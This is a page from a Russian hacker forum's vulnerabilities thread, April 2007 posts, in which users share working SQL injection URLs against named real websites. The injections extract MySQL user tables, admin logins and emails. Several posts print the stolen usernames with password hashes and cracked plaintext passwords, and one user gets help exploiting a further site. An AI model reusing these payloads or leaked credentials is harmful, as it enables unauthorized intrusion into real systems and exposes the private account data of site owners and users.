ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2081  
Старый 28.04.2007, 23:09
Аватар для V.I.P
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме:
1062869

Репутация: 136
Отправить сообщение для V.I.P с помощью ICQ
По умолчанию

Код HTML:
http://www.nerdtests.com/pics.php?id=-64+union+select+1,2,3,concat_ws(char(5 8),user,password),5,6,7+from+mysql.user+limit+6,1--
 
Ответить с цитированием

  #2082  
Старый 29.04.2007, 08:08
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

Код:
http://www.ahfx.net/weblog.php?article=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(table_name,0x71),0x71),3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables+limit+18,1/*
 
Ответить с цитированием

  #2083  
Старый 29.04.2007, 14:13
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.ontario-tut.ru/prihoj_big.php?id=-8+union+select+1,2,user(),concat(database(),char(58),version()),5,6,7,8,9,10,11,12,13/*
Код:
http://ww.trizway.com/show.php?id=-41+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13,14,15+from+subscriber/*&pg=2
author
news
 
Ответить с цитированием

sql-inj
  #2084  
Старый 29.04.2007, 19:27
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-inj

Сайт: http://www.botans.ru
уязвимость: http://www.botans.ru/study.php?groupid=2'
подобранные таблицы: users
подобранные поля: username,pass,email,id
193 организмa
Цитата:
http://www.botans.ru/study.php?groupid=-2+union+select+1,2,3,4,5,concat_ws(0x3a,id,usernam e,pass,email)+from+users/*
 
Ответить с цитированием

sql-continued
  #2085  
Старый 29.04.2007, 20:09
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-continued

Цитата:
Forcer
Металинк Фитнес Менеджер:
нашел users : login,password,email,id
marina:ce5225d01c39d2567bc229501d9e610d (pass:marina)
Цитата:
http://fitnessmanager.ru/index.php?page=catalog&action=position_list&id=-96+union+select+1,2,3,4,5,concat_ws(0x3a,id,login, password,email),7,8,9,10+from+users+limit+1,1/*
но практической пользы никакой - есть админка (http://fitnessmanager.ru/admin), но там другие данные.
 
Ответить с цитированием

  #2086  
Старый 29.04.2007, 23:29
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://zvisti.com.ua/info.php?id=-421%20UNION%20SELECT%201,2,3,4,5,table_name,7,8,9,10,11,12+from+INFORMATION_SCHEMA.TABLES+limit+15,1/*
Код:
http://sodruzestvo.com/news/news.php?nid=-3+union+select+1,user(),3/*
=\
 
Ответить с цитированием

  #2087  
Старый 30.04.2007, 01:08
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

бильярдец)
propool.ru
Код:
http://www.propool.ru/news.php?id=-1+union+select+1,2,3,4,concat(username,0x3a,user_password),6,7,8,9,10,11+from+bb_users+limit+1,1/*
Vladimir:9497a5313079f955e60747fed4639ae6:piraxy
админка защищена .htaccess'ом... =\
 
Ответить с цитированием

  #2088  
Старый 30.04.2007, 03:27
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

Вот решил Эстонию пощупать :

www.leisivald.ee

Код:
http://www.leisivald.ee/index.php?b=-45+union+select+concat(login,char(58),password),2+from+users/*
aina:462b87e9b978289beae59ff7ed7f4799
kaius:c2ea7f63c808abc0cf77b59226f3775b
 
Ответить с цитированием

  #2089  
Старый 30.04.2007, 10:11
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Help sql-inj: www.autoteatr.ru
Код:
http://www.autoteatr.ru/catalog.php?subid=114
http://www.autoteatr.ru/catalog.php?subid=115-1
http://www.autoteatr.ru/catalog.php?subid=114'
Дошёл до 40 колонок (скока же их там?) - не получается составить правильный запрос к БД.
 
Ответить с цитированием

  #2090  
Старый 30.04.2007, 10:22
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

http://www.autoteatr.ru/catalog.php?subid=-1+union+select+concat(convert(username+using+cp125 1),0x3a,convert(user_password+using+cp1251))+from+ phpbb_users+limit+1,2/*

Mixa:runner
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ